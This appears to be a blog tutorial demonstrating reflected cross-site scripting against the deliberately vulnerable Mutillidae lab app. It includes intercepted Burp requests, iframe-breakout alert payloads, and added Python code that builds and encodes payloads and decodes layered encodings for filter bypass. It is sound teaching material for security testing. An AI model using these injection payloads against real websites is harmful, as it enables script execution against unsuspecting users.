Friday, February 21, 2014

Web App Pentest - Part 5 XSS


In my previous article we looked at the different ways of fuzzing, including suffix and prefix fuzzing, and used those techniques to provoke error messages from the web application. Now that we know how to fuzz, we will use that skill to find cross site scripting, generally known as XSS.

Testing For XSS

Without wasting much time, let us go to the Document Viewer page under the A3 Cross Site Scripting (XSS) module of Mutillidae. There are various ways of exploiting XSS on that page, but first we will choose the simplest one, which is injecting into an HTML attribute.




As soon as you open the page, look at what it tells you. In this case we are given four different documents to view. One of the four is a downloadable document from the web application and the other three are displayed in the box below.



Let us keep the default selection, submit the document and intercept the request. The intercepted request is as follows:



GET /chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document
Cookie: showhints=0; PHPSESSID=e0a56snmg2cjhd3dccvar9h3o5
Connection: keep-alive



Looking at the PARAMS tab, we can identify PathToDocument as the main parameter: it is the one that decides which document's content is displayed in the box. So let us remove the value of that parameter and fuzz it with our skills. First I remove the whole line highlighted in red in the screenshot of the request above. Then I put in the simple text 'jonnybravo' to see whether my request gets processed successfully or the server gives me an error. So I am only changing the request line, which now reads as follows:



GET /chintan/index.php?page=document-viewer.php&PathToDocument=jonnybravo&document-viewer-php-submit-button=View+Document HTTP/1.1



After forwarding the request I got a 200 OK response from the server. I intercepted the response in Burp Suite as well, so that I can look at the HTML of the response page and find our input, jonnybravo.



There are two matches showing my input. Now I know what to keep in mind while crafting an XSS payload. In the first match jonnybravo is just text between quotes, but in the other it is the value of the src (source) attribute of an iframe tag.



We can test for XSS here by crafting a payload with the right prefix and suffix around the jonnybravo input. We cannot execute a payload directly in the middle of the iframe tag: anything between the opening and closing iframe tags is treated by the browser as raw frame content, not as markup. We have to break out of the tag and inject our payload outside the iframe element, before or after it. Once the payload lies in plain HTML it will be executed, unless some other protection is in place.



Show Time


Now here is our target, the iframe line from the response:

<iframe src="jonnybravo" width="700px" height="500px"></iframe>

The first thing we need to do is break the context. As you are all familiar with HTML, src="jonnybravo" is a double-quoted attribute value. To break the context we give "jonnybravo as input, so that the first " of the original code and the " at the start of our input together form an empty attribute value, src="", and the rest of our input lands inside the tag as a stray attribute. Our code now looks like this:

<iframe src=""jonnybravo" width="700px" height="500px"></iframe>

The iframe tag is still open, so to get our payload outside the iframe we need to close it. We end the opening tag with > and then give the closing tag, so our input becomes "jonnybravo></iframe>. The > matters: without it the </iframe> would sit inside the still-open opening tag and the browser would not treat it as a closing tag at all. Our new code is as follows:

<iframe src=""jonnybravo></iframe>" width="700px" height="500px"></iframe>



As you can see from the line above, the iframe is started and finished by our input, so we are now outside the iframe tag and can place our payload here. We will try to inject a JavaScript alert, for which the payload is <script>alert("momma")</script>. It all comes after our given input, so our new and final input is as follows:

Payload: "jonnybravo></iframe><script>alert("momma")</script>


The resulting code in the response is as below.

<iframe src=""jonnybravo></iframe><script>alert("momma")</script>" width="700px" height="500px"></iframe>



As you can see, the iframe tag is closed before our payload, so the script executes, and whatever is written after the payload (the width, the height and the original closing iframe tag) makes no difference: the leftover attributes are shown as plain text and the stray closing tag is ignored, because that code is incomplete and cannot form an element. So I put all this input into the request I had intercepted, and my new request is as follows.



GET /chintan/index.php?page=document-viewer.php&PathToDocument="jonnybravo></iframe><script>alert("momma")</script>&document-viewer-php-submit-button=View+Document HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document
Cookie: showhints=0; PHPSESSID=e0a56snmg2cjhd3dccvar9h3o5
Connection: keep-alive

Burp sends the payload exactly as typed. A browser would percent-encode the quotes and angle brackets, and PHP decodes them again before the value is echoed, so the page ends up the same either way.

After forwarding this request, as I told you, our JavaScript alert payload executes outside the frame, and it gave me a popup alert saying "momma", which was the input I gave.


To illustrate the work so far, let us intercept the response to this request and check where momma is lying in the code.
  

From the code you can see that the iframe tag is closed where we gave </iframe> in our input, and the script tag starts right after it; that script tag was the other part of the input we gave together. It is not mandatory to give " first followed by jonnybravo. You can also leave jonnybravo inside the src attribute and break out after it, with a payload like the following.

Payload: jonnybravo"></iframe><script>alert("momma")</script>

If I give the above payload I get the response shown in the figure below.




Here it executes the JavaScript and renders the iframe as well, because jonnybravo is still the source of the iframe. While the alert is up you will not see the iframe box, but as soon as you click the OK button and the complete page has loaded you will see the iframe box, as shown in the figure below.



To verify that it is an iframe box, I pressed F12 to see the runtime code of the page and used the Inspect Element option; it is not actually the Firebug add-on but the inspector built into the version of Firefox I am using. It shows that I am inspecting one element, and by looking at the HTML it can be confirmed that it is my iframe with jonnybravo as its source.
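The context check and breakout walked through above, as an added Python example that is not part of the original post: it feeds a constructed stand-in for the document-viewer response (the real response is only in the screenshots) to a parser, records where the jonnybravo canary lands, builds the attribute breakout payload, percent-encodes it for the request line, and checks that the script tag really ends up outside the iframe, which is also what shows why the > before </iframe> is needed. The iframe line, the request line and alert("momma") follow the post; the template strings, function names and the plain-text reflection are the example's own assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import quote

CANARY = "jonnybravo"

# Constructed stand-ins for the parts of the document-viewer response that echo the
# parameter: the iframe line shown in the post, plus one reflection as plain text.
IFRAME_LINE = '<iframe src="{c}" width="700px" height="500px"></iframe>'
SAMPLE_RESPONSE = '<html><body>\n<p>Document: "{c}"</p>\n' + IFRAME_LINE + '\n</body></html>'


def render(template, value):
    """Simulate the server echoing the (already URL-decoded) parameter into the page."""
    return template.format(c=value)


class ReflectionFinder(HTMLParser):
    """Records each place the canary appears and the HTML context it sits in."""

    def __init__(self, canary):
        super().__init__()
        self.canary = canary
        self.hits = []  # (context, tag, attribute) tuples

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and self.canary in value:
                self.hits.append(("attribute", tag, name))

    def handle_data(self, data):
        if self.canary in data:
            self.hits.append(("text", None, None))


def find_reflections(page, canary=CANARY):
    finder = ReflectionFinder(canary)
    finder.feed(page)
    finder.close()
    return finder.hits


def breakout_payload(context, canary=CANARY, js='alert("momma")'):
    """Wrap the canary in the prefix/suffix that escapes its context.

    Inside a double-quoted attribute: " closes the value, > ends the start tag and
    </tag> closes the element, so the script that follows is ordinary markup.
    Inside text nothing needs closing; the script tag is injected directly.
    """
    kind, tag, _attr = context
    if kind == "attribute":
        return f'"{canary}></{tag}><script>{js}</script>'
    if kind == "text":
        return f"{canary}<script>{js}</script>"
    raise ValueError(f"unknown context {kind!r}")


def encode_for_query(value):
    """Percent-encode everything but unreserved characters so the payload survives the
    request line intact (quote() leaves only letters, digits and _.-~ bare)."""
    return quote(value, safe="")


def request_line(payload):
    """The intercepted GET request from the post, with the payload in PathToDocument."""
    return ("GET /chintan/index.php?page=document-viewer.php&PathToDocument="
            + encode_for_query(payload)
            + "&document-viewer-php-submit-button=View+Document HTTP/1.1")


class ScriptTracker(HTMLParser):
    """Checks whether a <script> start tag occurs outside any open <iframe>. Markup between
    <iframe> and </iframe> is raw text to the browser, so a script landing there never runs."""

    def __init__(self):
        super().__init__()
        self.iframe_depth = 0
        self.script_outside_iframe = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframe_depth += 1
        elif tag == "script" and self.iframe_depth == 0:
            self.script_outside_iframe = True

    def handle_endtag(self, tag):
        if tag == "iframe" and self.iframe_depth:
            self.iframe_depth -= 1


def script_would_run(page):
    tracker = ScriptTracker()
    tracker.feed(page)
    tracker.close()
    return tracker.script_outside_iframe


if __name__ == "__main__":
    hits = find_reflections(render(SAMPLE_RESPONSE, CANARY))
    print("reflections:", hits)
    attr_ctx = next(h for h in hits if h[0] == "attribute")
    payload = breakout_payload(attr_ctx)
    print(request_line(payload))
    print("script runs:", script_would_run(render(IFRAME_LINE, payload)))
    no_gt = '"jonnybravo</iframe><script>alert("momma")</script>'
    print("script runs without '>':", script_would_run(render(IFRAME_LINE, no_gt)))
```

Running it prints the two reflection contexts, the encoded request line, True for the payload with the > and False for the variant without it: in the latter the </iframe> is swallowed as junk attributes of the still-open iframe start tag and the script becomes frame content.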



“It depends on your HTML skills and basic knowledge of encoding and decoding of special characters. If you know that in depth you can bypass the filters; however, OWASP provides an XSS filter evasion cheat sheet on their official website in case you need it. It explains encoding and decoding techniques along with filter bypassing techniques.”



Use Burp Decoder
Many times the URL you see will not be easy to understand just by looking at it: the server might be encoding at least the special characters. In such a situation, if you cannot read the URL, simply put it into Burp Decoder.


How-To

Encoded URL

http:%2f%2flocalhost%2Fchintan%2findex.php%3fpage%3ddocument%2dviewer.php%26PathToDocument%3ddocumentation%2Fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork.php%26document%2dviewer%2dphp%2dsubmit%2dbutton=View+Document

Let us assume we have this URL in encoded form and cannot understand what it says. Simply copy and paste the URL into Burp Decoder and click "Smart decode"; if Burp recognises the encoding it will decode the URL. I have decoded this URL and its simplified form is as follows:



Decoded URL:

http://localhost/chintan/index.php?page=document-viewer.php&PathToDocument=documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php&document-viewer-php-submit-button=View+Document

Every %XX pair above is one character: %2f is /, %3f is ?, %26 is &, %3d is = and %2d is -. In Burp it will look like this:
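What Smart decode does, as an added Python example that is neither part of the original post nor Burp's own code: peel one encoding layer at a time, URL percent-encoding or HTML entities, until the string stops changing, and report which decoders were applied in which order. The encoded URL is the one above with the stray space after http: removed; the double-encoded and mixed samples are constructed. The layer list is the useful part: a filter that decodes the input only once is bypassed by one extra layer, and this shows how many layers a given value is hiding.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The encoded URL from the post (stray space after "http:" removed).
ENCODED_URL = ("http:%2f%2flocalhost%2Fchintan%2findex.php%3fpage%3ddocument%2dviewer.php"
               "%26PathToDocument%3ddocumentation%2Fhow%2dto%2daccess%2dMutillidae"
               "%2dover%2dVirtual%2dBox%2dnetwork.php"
               "%26document%2dviewer%2dphp%2dsubmit%2dbutton=View+Document")

# Constructed samples: a value percent-encoded twice (%25 is an encoded "%"), and a
# value whose HTML entities were percent-encoded on top.
DOUBLE_ENCODED = "%2522momma%2522"
MIXED_ENCODED = "%26lt%3Bscript%26gt%3B"

PERCENT_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")
HTML_ENTITY = re.compile(r"&(?:#[0-9]+|#[xX][0-9A-Fa-f]+|[A-Za-z][A-Za-z0-9]*);")


def peel_one_layer(s):
    """Apply the single decoder the string visibly needs, or return (s, None)."""
    if PERCENT_ESCAPE.search(s):
        return unquote(s), "url"      # %XX -> character; "+" is deliberately left alone
    if HTML_ENTITY.search(s):
        return html.unescape(s), "html"
    return s, None


def smart_decode(s, max_layers=8):
    """Decode repeatedly, as Burp Decoder's Smart decode does, until nothing changes.
    Returns (decoded_string, [layer names in the order they were removed])."""
    layers = []
    for _ in range(max_layers):
        decoded, how = peel_one_layer(s)
        if how is None or decoded == s:
            break
        layers.append(how)
        s = decoded
    return s, layers


def query_parameters(url):
    """Split a decoded URL into its query parameters (blank values kept)."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


if __name__ == "__main__":
    url, layers = smart_decode(ENCODED_URL)
    print(layers, url)
    print("PathToDocument =", query_parameters(url)["PathToDocument"])
    print(smart_decode(DOUBLE_ENCODED))
    print(smart_decode(MIXED_ENCODED))
```

The + in View+Document is left as is: in a query string it means a space, but a decoder that turns it into one would also corrupt any literal + in a value, so the conversion is left to the query-parameter split at the end.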

 

Conclusion


So this is how a cross site scripting attack, also known as XSS, is launched by attackers against a web application. The attack can be used to bypass access controls. Whether it succeeds varies with the nature of the protection implemented by the web application developer, and it also depends on how the input data is handled by the web application.

